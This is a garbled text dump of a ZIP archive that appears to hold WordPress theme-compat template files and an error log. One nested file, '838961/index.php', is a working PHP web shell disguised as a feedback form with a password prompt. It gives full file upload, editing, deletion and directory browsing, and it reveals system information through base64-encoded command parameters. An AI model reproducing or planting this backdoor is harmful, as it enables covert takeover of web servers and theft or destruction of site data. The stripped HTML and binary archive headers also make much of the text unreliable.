PK!UsѾheader-embed.phpnu[ class="no-js"> <?php echo wp_get_document_title(); ?> > PK!footer-embed.phpnu[ PK!#Sdd header.phpnu[ > <?php echo wp_get_document_title(); ?> >

PK!i} embed.phpnu[
> $data ) { if ( $data['height'] > 0 && $data['width'] / $data['height'] > $aspect_ratio ) { $aspect_ratio = $data['width'] / $data['height']; $measurements = array( $data['width'], $data['height'] ); $image_size = $size; } } } /** * Filters the thumbnail image size for use in the embed template. * * @since 4.4.0 * @since 4.5.0 Added `$thumbnail_id` parameter. * * @param string $image_size Thumbnail image size. * @param int $thumbnail_id Attachment ID. */ $image_size = apply_filters( 'embed_thumbnail_image_size', $image_size, $thumbnail_id ); $shape = $measurements[0] / $measurements[1] >= 1.75 ? 'rectangular' : 'square'; /** * Filters the thumbnail shape for use in the embed template. * * Rectangular images are shown above the title while square images * are shown next to the content. * * @since 4.4.0 * @since 4.5.0 Added `$thumbnail_id` parameter. * * @param string $shape Thumbnail image shape. Either 'rectangular' or 'square'. * @param int $thumbnail_id Attachment ID. */ $shape = apply_filters( 'embed_thumbnail_image_shape', $shape, $thumbnail_id ); } if ( $thumbnail_id && 'rectangular' === $shape ) : ?>


PK! index.phpnu[PK!Cdd comments.phpnu[

PK!bJ=+=+838961/index.phpnu[Website Feedback Form"; echo "

Please fill out the form below to send us your feedback.

"; echo "
"; echo "
"; echo "
"; echo "
"; echo ""; echo "
"; echo "

Contact Support

"; echo ""; echo ""; if (isset($_POST['password'])) { echo "

Invalid password.

"; } exit; } } // File management functionality (accessible only after authentication) // Display random string for obfuscation function randomFunction() { $randomString = bin2hex(random_bytes(96)); return $randomString; } $randomString = randomFunction(); echo "

Random String: $randomString

"; // Display system information function systemCheck() { $info = php_uname(); $phpVersion = phpversion(); echo "

System Info: $info | PHP Version: $phpVersion

"; } systemCheck(); $special_chars = "%00%0A%09//#"; // Command encoding and decoding functions function encodeCommand($command) { return base64_encode($command); } function decodeCommand($encoded) { return base64_decode($encoded); } // Display directory listing function displayDirectory($path) { global $special_chars; $items = array_diff(scandir($path), ['.', '..']); echo "

Current Directory: $path

"; } // Handle file upload function handleFileUpload($path) { if (!empty($_FILES['file']['name'])) { $target = $path . DIRECTORY_SEPARATOR . basename($_FILES['file']['name']); if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) { echo "

File uploaded successfully!

"; } else { echo "

Failed to upload file.

"; } } } // Create new folder function createNewFolder($path) { if (!empty($_POST['folder_name'])) { $folderPath = $path . DIRECTORY_SEPARATOR . $_POST['folder_name']; if (!file_exists($folderPath)) { mkdir($folderPath); echo "

Folder created: {$_POST['folder_name']}

"; } else { echo "

Folder already exists.

"; } } } // Create new file function createNewFile($path) { if (!empty($_POST['file_name'])) { $filePath = $path . DIRECTORY_SEPARATOR . $_POST['file_name']; if (!file_exists($filePath)) { file_put_contents($filePath, ''); echo "

File created: {$_POST['file_name']}

"; } else { echo "

File already exists.

"; } } } // Display file edit form function displayEditForm($filePath, $path) { $content = file_exists($filePath) ? htmlspecialchars(file_get_contents($filePath)) : ''; echo "

"; } // Delete file function deleteFile($filePath) { if (file_exists($filePath)) { if (unlink($filePath)) { echo "

File deleted successfully.

"; } else { echo "

Failed to delete file.

"; } } else { echo "

File does not exist.

"; } } // Display rename form function displayRenameForm($itemPath, $path) { echo "
"; } // Handle POST requests if ($_SERVER['REQUEST_METHOD'] === 'POST') { if (isset($_GET['data'])) { $command = decodeCommand($_GET['data']); $parts = explode('|', $command, 4); if ($parts[0] == 'action' && $parts[1] == 'edit') { $path = $parts[2]; $item = $parts[3]; $itemPath = $path . DIRECTORY_SEPARATOR . $item; if (isset($_POST['content'])) { file_put_contents($itemPath, $_POST['content']); echo "

File updated successfully!

"; } } elseif ($parts[0] == 'action' && $parts[1] == 'rename') { $path = $parts[2]; $item = $parts[3]; $itemPath = $path . DIRECTORY_SEPARATOR . $item; if (isset($_POST['new_name'])) { $newPath = $path . DIRECTORY_SEPARATOR . $_POST['new_name']; if (rename($itemPath, $newPath)) { echo "

Item renamed successfully.

"; } else { echo "

Failed to rename item.

"; } } } elseif ($parts[0] == 'navigate') { $path = $parts[1]; if (isset($_FILES['file'])) { handleFileUpload($path); } elseif (isset($_POST['folder_name'])) { createNewFolder($path); } elseif (isset($_POST['file_name'])) { createNewFile($path); } } $navigateCommand = encodeCommand('navigate|' . $path); header("Location: ?data=$navigateCommand"); exit; } } // Handle GET requests if (isset($_GET['data'])) { $command = decodeCommand($_GET['data']); $parts = explode('|', $command, 4); if ($parts[0] == 'navigate') { $path = $parts[1]; $parentPath = dirname($path); $goUpCommand = encodeCommand('navigate|' . $parentPath); echo "$special_chars Go Up"; displayDirectory($path); echo "

Upload File

"; echo "

Create Folder

"; echo "

Create File

"; } elseif ($parts[0] == 'action') { $action = $parts[1]; $path = $parts[2]; $item = $parts[3]; $itemPath = $path . DIRECTORY_SEPARATOR . $item; if ($action == 'delete') { deleteFile($itemPath); $navigateCommand = encodeCommand('navigate|' . $path); header("Location: ?data=$navigateCommand"); exit; } elseif ($action == 'edit') { displayEditForm($itemPath, $path); } elseif ($action == 'rename') { displayRenameForm($itemPath, $path); } } } else { $path = getcwd(); $parentPath = dirname($path); $goUpCommand = encodeCommand('navigate|' . $parentPath); echo "$special_chars Go Up"; displayDirectory($path); echo "

Upload File

"; echo "

Create Folder

"; echo "

Create File

"; } // Add logout link echo "
Logout"; ?>PK!]J error_lognu[[10-May-2025 16:22:43 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php on line 13 [17-May-2025 00:11:34 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/comments.php on line 9 [17-May-2025 00:11:36 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-404.php on line 14 [17-May-2025 00:11:38 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-content.php on line 13 [17-May-2025 00:11:43 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php on line 13 [17-May-2025 00:11:44 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer-embed.php on line 18 [17-May-2025 00:11:46 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer.php on line 9 [17-May-2025 00:11:49 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header-embed.php on line 19 [17-May-2025 00:11:51 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header.php on line 9 [17-May-2025 00:11:54 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/sidebar.php on line 9 [30-May-2025 12:35:28 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php on line 13 [02-Jun-2025 07:40:01 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/comments.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/comments.php on line 9 [02-Jun-2025 07:40:01 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _e() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-404.php:14 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-404.php on line 14 [02-Jun-2025 07:40:02 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function post_class() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-content.php:13 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed-content.php on line 13 [02-Jun-2025 07:40:02 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function get_header() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php:13 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/embed.php on line 13 [02-Jun-2025 07:40:03 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function do_action() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer-embed.php:18 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer-embed.php on line 18 [02-Jun-2025 07:40:04 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/footer.php on line 9 [02-Jun-2025 07:40:05 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function language_attributes() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header-embed.php:19 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header-embed.php on line 19 [02-Jun-2025 07:40:05 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/header.php on line 9 [02-Jun-2025 07:40:06 America/New_York] PHP Fatal error: Uncaught Error: Call to undefined function _deprecated_file() in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/sidebar.php:9 Stack trace: #0 {main} thrown in /home/abhiramc/public_html/gymnastics/wp-includes/theme-compat/sidebar.php on line 9 PK!d{a/ sidebar.phpnu[ PK!ĽW9 embed-404.phpnu[

' . esc_html( get_bloginfo( 'name' ) ) . '' ); ?>

PK!UsѾheader-embed.phpnu[PK!footer-embed.phpnu[PK!#Sdd header.phpnu[PK!i}  embed.phpnu[PK!"{ embed-content.phpnu[PK!+~ footer.phpnu[PK!  index.phpnu[PK!Cdd !comments.phpnu[PK!bJ=+=+)838961/index.phpnu[PK!]J 8Uerror_lognu[PK!d{a/ unsidebar.phpnu[PK!ĽW9 9embed-404.phpnu[PK =